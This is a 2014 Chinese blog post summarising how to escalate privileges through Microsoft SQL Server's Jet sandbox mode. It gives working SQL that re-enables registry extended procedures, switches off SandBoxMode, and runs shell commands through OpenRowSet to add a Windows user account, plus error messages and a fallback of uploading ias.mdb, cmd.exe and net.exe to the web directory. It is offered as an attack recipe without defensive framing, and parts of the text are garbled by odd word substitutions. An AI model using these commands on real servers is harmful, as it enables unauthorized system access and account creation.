Chinaunix首页 | 论坛 | 博客
  • 博客访问: 2719
  • 博文数量: 1
  • 博客积分: 0
  • 博客等级: 民兵
  • 技术积分: 20
  • 用 户 组: 普通用户
  • 注册时间: 2013-06-13 02:51
文章分类
文章存档

2014年(1)

我的朋友
最近访客

分类: 其他平台

2014-06-06 17:33:58

MSSQL沙盒模式提权问题总结






恢复对注册表的读写存储。

dbcc addextendedproc ('xp_regread','xpstar.dll')

dbcc addextendedproc ('xp_regwrite','xpstar.dll')



修复沙盒的维护模式

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;

查看'SandBoxMode'值是否已经变成0了。

exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines', 'SandBoxMode'



最后调用沙盒模式

Select . From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Databasec:\windows\system32\ias\ias.mdb','select shell( net user itpro gmasfm /add )');

1.如果沙盒掩护模式未 封闭 ,会报错:

服务器: 消息 7357,级别 16,状态 2,行 1

未能处理对象 'select shell( cmd.exe /c net user user passwd /add )'。OLE DB 提供程序 'microsoft.jet.oledb.4.0' 指出该对象中没有任何列。

OLE DB 错误跟踪.Noninterface error: OLE DB provider unable to process object, since the object has no columnsProviderName'microsoft.jet.oledb.4.0', Queryselect shell( cmd.exe /c net user user passwd /add )'.。



2.如果.mdb不存在或是输入门路错误

服务器: 消息 7399,级别 16,状态 1,行 1

OLE DB 供给程序 'microsoft.jet.oledb.4.0' 报错。

.OLE/DB provider returned message: 找不到文件 'C:WINDOWSsystem32iasdnary1.mdb'。.

OLE DB 错误跟踪.OLE/DB Provider 'microsoft.jet.oledb.4.0' IDBInitialize::Initialize returned 0x80004005: .。



3.如果输入进程中多了一些空格,也会报错。尤其要留神这点,良多人直接网上找文章复制粘贴进去执行。

服务器: 消息 7357,级别 16,状态 2,行 1

未能处置对象 'select shell( cmd.exe /c net user user passwd /add )'。OLE DB 提供程序 'microsoft.jet.oledb.4.0' 指出该对象中不任何列。

OLE DB 毛病跟踪.Noninterface error: OLE DB provider unable to process object, since the object has no columnsProviderName'microsoft.jet.oledb.4.0', Queryselect shell( cmd.exe /c net user user passwd /add )'.。



4.假如mdb权限和cmd.exe权限错误,同样会也呈现问题。

当mdb权限不对时,

服务器: 新闻 7320,级别 16,状况 2,行 1

未能对 OLE DB 提供程序 'Microsoft.Jet.OLEDB.4.0' 执行查问。

.OLE/DB provider returned message: 未知.

OLE DB 过错跟踪.OLE/DB Provider 'Microsoft.Jet.OLEDB.4.0' ICommandText::Execute returned 0x80040e14.。



5.如果net权限不对时,却没有任何提醒。

终极的提权措施就是在当前的web目录下面上传体系的ias.mdb跟cmd.exe,net.exe三个文件。履行

select . from openrowset('microsoft.jet.oledb.4.0',';databaseE:\we\bias.mdb','select shell( E:\web\cmd.exe /c E:\web\net.exe user user passwd /add )')

胜利增添一个盘算机用户

阅读(1534) | 评论(0) | 转发(0) |
0

上一篇:没有了

下一篇:没有了

给主人留下些什么吧!~~